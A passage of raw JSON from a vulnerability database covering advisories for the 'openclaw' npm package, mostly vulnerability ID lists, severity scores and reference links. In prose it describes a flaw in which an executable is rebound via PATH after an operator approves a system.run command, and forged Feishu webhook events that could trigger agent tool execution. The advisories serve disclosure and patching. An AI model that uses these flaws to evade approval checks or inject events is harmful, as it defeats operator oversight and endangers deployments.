ffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-9q2p-vc84-2rwm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-edn6-zer1-cya4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91300?format=json","vulnerability_id":"VCID-em6w-a7mj-mqa4","summary":"Duplicate Advisory: OpenClaw: system.run approvals did not bind PATH-token executable identity, enabling post-approval executable rebind\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-q399-23r3-hfx4. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.1 fail to pin executable identity for non-path-like argv[0] tokens in system.run approvals, allowing post-approval executable rebind attacks. 
Attackers can modify PATH resolution after approval to execute a different binary than the operator approved, enabling arbitrary command execution.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-executable-rebind-via-unbound-path-token-in-system-run-approvals"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997","reference_id":"CVE-2026-31997","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31997"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4","reference_id":"GHSA-q399-23r3-hfx4","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"4.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X
/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q399-23r3-hfx4"},{"reference_url":"https://github.com/advisories/GHSA-q86m-697p-h7fh","reference_id":"GHSA-q86m-697p-h7fh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q86m-697p-h7fh"}],"fixed_packages":[],"aliases":["GHSA-q86m-697p-h7fh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-em6w-a7mj-mqa4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90982?format=json","vulnerability_id":"VCID-ewa7-qswv-tqet","summary":"OpenClaw: Feishu webhook mode accepted forged events when only `verificationToken` was configured\n### Summary\n\nFeishu webhook mode allowed deployments that configured only `verificationToken` without `encryptKey`. In that state, forged inbound events could be accepted because the weaker configuration did not provide the required cryptographic verification boundary.\n\n### Impact\n\nAn unauthenticated network attacker who could reach the webhook endpoint could inject forged Feishu events, impersonate senders, and potentially trigger downstream tool execution subject to the local agent policy.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Feishu webhook mode now fails closed unless `encryptKey` is configured, and the webhook transport rejects missing or invalid signatures before dispatch. 
Update to `2026.3.12` or later and configure `encryptKey` for webhook deployments.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32974","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15522","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15561","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.1557","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32974"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7844bc89a1612800810617c823eb0c76ef945804","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7844bc89a1612800810617c823eb0c76ef945804"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44087","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44087"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring
_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g353-mgv3-8pcj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32974"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-forged-event-injection-via-feishu-webhook-verification-token"},{"reference_url":"https://github.com/advisories/GHSA-g353-mgv3-8pcj","reference_id":"GHSA-g353-mgv3-8pcj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g353-mgv3-8pcj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7
cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yu
d8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7
c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gq
db"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mq
a9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wf
gj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-32974","GHSA-g353-mgv3-8pcj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ewa7-qswv-tqet"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89584?format=json","vulnerability_id":"VCID-fekn-d6f3-xfa6","summary":"OpenClaw: HTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n## Summary\nHTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: This is a real trusted-proxy HTTP CSRF or browser-origin gap in released tags, but it is not critical because it depends on identity-bearing trusted-proxy browser deployments rather than the shared-secret HTTP operator model.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: 
`<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d` — 2026-03-31T19:49:26+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41347","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.047","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04712","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04728","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41347"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"}],"url":"https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","r
eference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-